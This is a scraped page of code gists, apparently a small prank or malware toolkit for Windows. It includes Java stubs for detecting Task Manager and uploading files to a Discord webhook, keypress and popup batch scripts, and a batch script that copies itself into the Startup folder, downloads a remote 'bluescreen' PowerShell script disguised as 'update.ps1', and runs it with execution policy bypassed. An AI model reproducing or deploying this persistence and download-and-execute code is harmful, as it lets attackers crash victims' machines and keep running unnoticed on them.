This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import java.io.BufferedReader; | |
import java.io.IOException; | |
import java.io.InputStreamReader; | |
import java.util.Locale; | |
public class TaskManagerCheck { | |
public static boolean isTaskManagerOpen(){ | |
try{ | |
String line; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import javax.net.ssl.HttpsURLConnection; | |
import java.io.DataOutputStream; | |
import java.io.IOException; | |
import java.io.OutputStream; | |
import java.net.URL; | |
import java.nio.charset.StandardCharsets; | |
public class ToDiscord { | |
public static void sendFileToDiscord(String webhookUrl, String content, String filename) { |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
@if (@a==@b) @end /* | |
:: batch portion | |
@ECHO OFF | |
cscript /e:jscript "%~f0" | |
:: JScript portion */ | |
var shl = new ActiveXObject("WScript.Shell"); | |
for (var i=0; i<50; i++) { | |
shl.SendKeys(String.fromCharCode(0xAF)); | |
} |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
@echo off | |
REM Create Notification Settings | |
set "title=TITEL" | |
set "text=TEXT" | |
set "type=Information" | |
REM type can be "Information", "Warning", "Error" | |
powershell -WindowStyle Hidden -Command "Add-Type -AssemblyName System.Windows.Forms; Add-Type -AssemblyName System.Drawing; $notify = New-Object System.Windows.Forms.NotifyIcon; $notify.Icon = [System.Drawing.SystemIcons]::%type%; $notify.Visible = $true; $notify.ShowBalloonTip(0, '%title%', '%text%', [System.Windows.Forms.ToolTipIcon]::None)" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
@echo off | |
REM Create MessageBox Settings | |
set "title=TITEL" | |
set "text=TEXT" | |
set "button=OK" | |
set "type=Information" | |
REM type can be "Information", "Warning", "Error" | |
powershell -WindowStyle Hidden -Command "Add-Type -AssemblyName System.Windows.Forms; [System.Windows.Forms.MessageBox]::Show('%text%', '%title%', '%button%', [System.Windows.Forms.MessageBoxIcon]::%type%);" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
@echo off | |
setlocal enabledelayedexpansion | |
if not exist "%APPDATA%/Microsoft/Windows/Start Menu/Programs/Startup/%~n0%~x0" ( | |
copy /y %~f0 "%AppData%\Microsoft\Windows\Start Menu\Programs\Startup\") | |
mkdir "%temp%/G023489038533772_TempCacheDownload/" | |
powershell -Command "[System.Net.WebRequest]::DefaultWebProxy = [System.Net.WebRequest]::GetSystemWebProxy(); [System.Net.WebRequest]::DefaultWebProxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials; (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/fab3F/40883616ac41779dfbad5c8a1a349552/raw/426eebfca3a7c4f96455fb93a869bbc9bcf73003/bluescreen.ps1', '%temp%/G023489038533772_TempCacheDownload/update.ps1') -Force" | |
powershell -ExecutionPolicy Bypass -File "%temp%\G023489038533772_TempCacheDownload\update.ps1" | |
endlocal | |
exit |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
@echo off | |
:: https://fab3F.github.io | |
:: 03-01-2024 | |
color 2 | |
title fab3F Custom CMD | |
cls | |
echo. | |
echo ------------------------------------------------ | |
echo ^|^>^<^>^<^>^<^>^<^>^<^>^<^>^<^>^<^>^<^>^<^>^<^>^<^>^<^>^<^>^<^>^<^>^<^>^<^>^<^>^<^>^<^>^<^>^<^| | |
echo ^|^> ^<^| |